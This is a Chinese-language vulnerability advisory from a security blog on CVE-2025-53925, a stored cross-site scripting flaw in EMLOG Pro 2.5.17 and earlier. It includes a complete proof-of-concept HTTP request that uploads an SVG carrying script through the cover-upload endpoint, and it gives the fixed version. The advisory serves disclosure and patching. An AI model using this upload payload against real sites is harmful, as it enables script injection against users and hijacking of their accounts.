首页 网络安全 正文
  • 本文约1322字,阅读需7分钟
  • 15
  • 0

EMLOG Pro 2.5.17跨站点脚本漏洞CVE-2025-53925

摘要

栋科技漏洞库关注到EMLOG Pro 2.5.17及之前版本中,存在一个跨站脚本(XSS)漏洞,现被追踪为CVE-2025-53925,CVSS评分5.4。

EMLOG是“Every Memory Log”的简称,是一款基于PHP语言和MySQL数据库的开源、免费、功能强大的个人或多人联合撰写的博客系统。

EMLOG Pro 2.5.17版本的主题可以控制个人介绍信息是否支持HTML,该版本发布于2025年06月29日,复制粘贴上传图片不再增加链接。

EMLOG Pro 2.5.17跨站点脚本漏洞CVE-2025-53925

栋科技漏洞库关注到EMLOG Pro 2.5.17及之前版本中,存在一个跨站脚本(XSS)漏洞,现被追踪为CVE-2025-53925,CVSS评分5.4。

二、漏洞分析

CVE-2025-53925漏洞存在于EMLOG Pro 2.5.17以及之前的版本中,是存在于文件上传功能中存在的一个存储跨站点脚本(XSS)漏洞。

允许经过身份验证的远程攻击者通过文件上传功能注入任意网页脚本或HTML代码,认证用户上传svg文件包含稍后执行的JavaScript代码。

具体来说,攻击者可以向经过身份验证的用户即注册用户,上传包含JavaScript代码的.svg文件,这些代码随后会被执行,从而利用漏洞。

三、POC概念验证

1、为了利用该漏洞,向注册用户发送以下HTTP请求:

POST /emlog/admin/article.php?action=upload_cover HTTP/1.1
Host: [REDACTED]
Content-Length: 422
X-Requested-With: XMLHttpRequest
User-Agent: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWD5cFBVEf2uLiv4b
Sec-GPC: 1
Accept-Language: pl-PL,pl;q=0.6
Origin: http://[REDACTED]
Referer: http://[REDACTED]/emlog/admin/page.php?action=mod&id=2
Accept-Encoding: gzip, deflate, p
Cookie: commentposter=abc%5C%27%5C%22%3E%3Ch1%3Eabc%3C%2Fh1%3E%24%7B%7B33-11%7D%7D%3C%5C%27%5C%22; postermail=abc%40cba.pl; PHPSESSID=[REDACTED]; EM_AUTHCOOKIE_[REDACTED]=[REDACTED]
Connection: keep-alive

------WebKitFormBoundaryWD5cFBVEf2uLiv4b
Content-Disposition: form-data; name="image"; filename="cover.svg"
Content-Type: image/png

<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
<rect width="124" height="124" rx="24" fill="#000000"/>
   <script type="text/javascript">  
      alert(0x539);
   </script>
</svg>

------WebKitFormBoundaryWD5cFBVEf2uLiv4b--

2、访问上传的文件URL ,上传此类文件后,可以将URL发送给其他用户或说服他们访问该URL

四、影响范围

EMLOG Pro <= 2.5.17

五、修复建议

EMLOG Pro >= 2.5.18

六、参考链接

管理员已设置登录后刷新可查看



扫描二维码,在手机上阅读
评论
更换验证码
友情链接